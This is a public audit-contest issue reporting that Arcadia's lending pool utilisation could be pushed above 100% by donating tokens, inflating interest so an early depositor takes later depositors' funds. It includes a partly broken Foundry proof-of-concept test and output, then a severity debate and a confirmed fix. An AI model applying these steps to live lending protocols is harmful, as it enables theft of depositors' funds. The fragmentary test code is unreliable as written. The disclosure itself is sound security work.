sherlock-audit / 2023-12-arcadia-judging

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Bandit - Utilisation Can Be Manipulated Far Above 100% #93

Open sherlock-admin2 opened 6 months ago

sherlock-admin2 commented 6 months ago



Utilisation Can Be Manipulated Far Above 100%


The utilisation of the protocol can be manipulated far above 100% via token donation. It is easiest to set this up on an empty pool. This can be used to manipulate the interest to above 10000% per minute to steal from future depositors.

Vulnerability Detail

This attack is inspired by / taken from this bug report for Silo Finance. I recommend reading it as is very well written:

The utilisation is basically _assets_borrowed / assetsloaned. A higher utilisation creates a higher interest rate. This is assumed to be less than 100%. However if it exceeds 100%, there is no cap here:

Normally, assets borrowed should never exceed assets loaned, however this is possible in Arcadia as the only thing stopping a borrow exceeding loans is that the transfer of tokens will revert due to not enough tokens in the Lending pool. However, an attacker can make it not revert by simply sending tokens directly into the lending pool. For example using the following sequence:

  1. deposit 100 assets into tranche
  2. Use ERC20 Transfer to transfer 1e18 assets into the LendingPool
  3. Borrow the 1e18 assets

These are the first steps of the coded POC at the bottom of this issue. It uses a token donation to make a borrow which is far larger than the loan amount.

In the utilisation calculation, this results in a incredibly high utilisation rate and thus interest rate as it is not capped at 100%. This is why some protocols implement a hardcap of utilisation at 100%.

The interest rate is so high that over 2 minutes, 100 assets grows to over100000 assets, or a 100000% interest over 2 minutes. The linked similar exploit on Silo Finance has an even more drastic interest manipulation which could drain the whole protocol in a block. However I did not optimise the numbers for this POC.

Note that the 1e18 assets "donated" to the protocol are not lost. They can simply be all borrowed into an attackers account.

The attacker can set this up when the initial lending pool is empty. Then, they can steal assets from subsequent depositors due to the huge amount of interest collected from their small initial deposit

Let me sum up the attack in the POC:

  1. deposit 100 assets into tranche
  2. Use ERC20 Transfer to transfer 1e18 assets into the LendingPool
  3. Borrow the 1e18 assets
  4. Victim deposits into tranche
  5. Attacker withdraws the victims funds which is greater than the 100 assets the attacker initially deposited

Here is the output from the console.logs:

Running 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test
[PASS] testScenario_Poc() (gas: 799155)
  100 initial pool balance. This is also the amount deposited into tranche
  warp 2 minutes into future
  mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack
  22 shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!

This is the edited version of setUp() in _scenario.t.sol

function setUp() public virtual override(Fuzz_Lending_Test) {

        pool.addTranche(address(tranche), 50);

        // Deposit funds in the pool.
        deal(address(mockERC20.stable1), users.liquidityProvider, type(uint128).max, true);

        mockERC20.stable1.approve(address(pool), 100);
        //only 1 asset was minted to the liquidity provider, users.liquidityProvider);

        pool.setAccountVersion(1, true);
            Constants.interestRate, Constants.interestRate, Constants.interestRate, Constants.utilisationThreshold


This test was added to BorrowAndRepay.scenario.t.sol

    function testScenario_Poc() public {

        uint poolBalance = mockERC20.stable1.balanceOf(address(pool));
        console.log(poolBalance, "initial pool balance. This is also the amount deposited into tranche");
        mockERC20.stable1.approve(address(pool), 1e18);

        // Given: collateralValue is smaller than maxExposure.
        //amount token up to max
        uint112 amountToken = 1e30;
        uint128 amountCredit = 1e10;

        //get the collateral factor
        uint16 collFactor_ = Constants.tokenToStableCollFactor;
        uint256 valueOfOneToken = (Constants.WAD * rates.token1ToUsd) / 10 ** Constants.tokenOracleDecimals;

        //deposits token1 into proxyAccount
        depositTokenInAccount(proxyAccount, mockERC20.token1, amountToken);

        uint256 maxCredit = (
            //amount credit is capped based on amount Token
            (valueOfOneToken * amountToken) / 10 ** Constants.tokenDecimals * collFactor_ / AssetValuationLib.ONE_4
                / 10 ** (18 - Constants.stableDecimals)

        //borrow the amountCredit to the proxy account
        pool.borrow(amountCredit, address(proxyAccount), users.accountOwner, emptyBytes3);

        assertEq(mockERC20.stable1.balanceOf(users.accountOwner), amountCredit);

        //warp 2 minutes into the future.
        vm.roll(block.number + 10);
        vm.warp(block.timestamp + 120);

        console.log("warp 2 minutes into future");

        address victim = address(123);
        deal(address(mockERC20.stable1), victim, type(uint128).max, true);

        mockERC20.stable1.approve(address(pool), type(uint128).max);
        uint shares =, victim);

        console.log("mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack");

        //function withdraw(uint256 assets, address receiver, address owner_)

        //WITHDRAWN 1e5
        uint withdrawShares = tranche.withdraw(1e5, users.liquidityProvider,users.liquidityProvider);

        console.log(withdrawShares, "shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!");



An early depositor can steal funds from future depositors through utilisation/interest rate manipulation.

Code Snippet

Tool used

Manual Review


Add a utilisation cap of 100%. Many other lending protocols implement this mitigation.

sherlock-admin2 commented 6 months ago

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: utilization should be mitigated; high(6)

sherlock-admin commented 6 months ago

The protocol team fixed this issue in PR/commit

sherlock-admin2 commented 6 months ago

This should be high as it can steal both the first subsequent deposit and all future deposits after that. The original linked issue for Silo Finance was Critical although Silo had multiple simultaneous pools. The interest rate formula for both Silo and Arcadia are the same, but that POC was more optimised which shows a faster rate of massive interest accrual.

You've deleted an escalation for this issue.

nevillehuang commented 6 months ago

Hi @Banditx0x I believe the following factors mentioned by @zzykxx in his report warrants the decrease in severity:

  • The interest rate is capped at 2^80 (~= 10^24) because of the downcasting in LendingPool::_calculateInterestRate(). The maximum interest is about 100% every 20 days.
  • The tokens sent directly to the pool by the griefer are effectively lost and can be transferred to the treasury.
  • The virtual shares implementation in the tranches might prevent the attacker from collecting all of the interest.

Sponsors Comments:

impact is only possible in quasi empty pools, and cost for doing it is largely in line with the damage done. In the example of 93, only 100 assets are in the pool, 1e18 are donated by the attacker → only the user borrowing the 100 assets is affected, so in this case of an empty pool, not a lot, and even more, the 1e18 can indeed be borrowed by the attacker, but he’ll be liquidated and incur a loss himself: he is the one paying the interest he jacked up (even if only >100 is recovered through liquidations, the LP actually profits, since the penalty is paid on a larger amount than what the “good” lp borrowed out). → low probability, cost is high → medium at most

zzykxx commented 6 months ago

Hey @Banditx0x, correct me if I'm wrong, but I think the following applies here:

Some damage can be caused by abusing this issue, but I think the damage is not big enough to classify this as high severity. Of course, I would be more than happy to be proven wrong since this would also be in my personal interest.

Banditx0x commented 6 months ago

@zzykxx thanks for the response. You're right that the Silo finance situation had much higher impact due to manipulation of one asset allowing borrows of another. However I had originally thought that the impact would be High even with this in mind as it had the same impact as the share inflation attack which historically has had high severity.

I hadn't realised the maximum interest rate was capped at uint80, which indeed caps the interest rate to far lower than the issue I had linked.

Given the slower interest rate accrual than I originally thought, I agree with the medium severity.

Edit: i deleted past escalation comment due to this discussion. Just so this conversation makes sense for future readers.

Czar102 commented 6 months ago

Planning to reject the escalation and leave the issue as is.

Czar102 commented 6 months ago

Result: Medium Has duplicates

midori-fuse commented 6 months ago

Wasn't the escalation deleted before the period end?

Banditx0x's comment was last edited on 5:26AM UTC, while the escalation period end was 12:36PM same day.

Czar102 commented 6 months ago

@midori-fuse It looks so, we will look into it. Thank you for bringing this up!

Czar102 commented 6 months ago

The escalation should have been deleted, there was an issue on Sherlock's part that's now resolved.

IAm0x52 commented 5 months ago

Fix looks good. Utilization is now capped at 100%

sherlock-admin4 commented 5 months ago

The Lead Senior Watson signed off on the fix.